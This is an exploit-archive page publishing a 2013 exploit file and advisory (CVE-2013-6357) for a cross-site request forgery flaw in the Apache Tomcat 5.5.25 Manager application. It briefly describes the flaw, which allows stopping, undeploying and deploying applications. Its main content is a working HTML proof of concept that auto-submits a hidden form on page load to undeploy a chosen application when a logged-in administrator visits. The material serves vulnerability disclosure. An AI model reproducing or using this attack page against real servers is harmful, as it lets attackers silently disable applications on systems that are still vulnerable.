Apache Tomcat 5.5.25 Cross Site Request Forgery

Apache Tomcat 5.5.25 Cross Site Request Forgery: Posted Nov 4, 2013; Authored by Ivano Binetti; Apache Tomcat version 5.5.25 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; advisories | CVE-2013-6357; SHA-256 | 3b4c8cfd49efc14d10b5b4f7153524eef6ad2a708d0e0998b67b8820bfb36e18; Download | Favorite | View

Apache Tomcat 5.5.25 Cross Site Request Forgery

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title     :  Apache Tomcat 5.5.25 CSRF Vulnerabilities
# Date              :  10-24-2013
# Author            :  Ivano Binetti (http://ivanobinetti.com)
# Author            :  Gianmarco Pirozzi (http://www.linkedin.com/pub/gianmarco-pirozzi/63/80b/2a5)
# Vendor site       :  http://tomcat.apache.org/
# Version           :  Apache Tomcat 5.5.25 and below (other versions could be affected)
# Tested on         :  Apache Tomcat 5.5.25
# Original Advisory :  http://www.webapp-security.com/2013/11/apache-tomcat-5-5-25-deployundeploystartstop-applications/
# CVE-ID            :  CVE-2013-6357
+---------------------------------------------------------------------------------------------------------------------------------+
Summary

1)Introduction
2)Vulnerability Description
3)Exploit
 3.1 Undeploy Applications
+---------------------------------------------------------------------------------------------------------------------------------+

1) Introduction
Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. 
The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process.

2) Vulnerability Description
Apache Tomcat 5.5.25 and below (other versions could be affected) is prone to a CSRF vulnerability affecting the Manager application
(which is the component utilized to start/stop/deploy/undeploy applications) in order to perform the following malicious activities:

- stop an existing application
- undeploy an existing application
- deploy a new application

In this Advisory I will only demonstate how to automatically undeploy an existing application.

3) Exploit 
 3.1 Undeploy Applications
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to Undeploy an Application</H2>
 <form method="POST" name="form0" action="http://<tomcat_ip>:<tomcat_tcp/port>/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
 </form>
 </body>
 </html>
+----------------------------------------------------------------------------------------------------------------------------------+

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Apache Tomcat 5.5.25 Cross Site Request Forgery

Apache Tomcat 5.5.25 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Apache Tomcat 5.5.25 Cross Site Request Forgery

Share This

Apache Tomcat 5.5.25 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems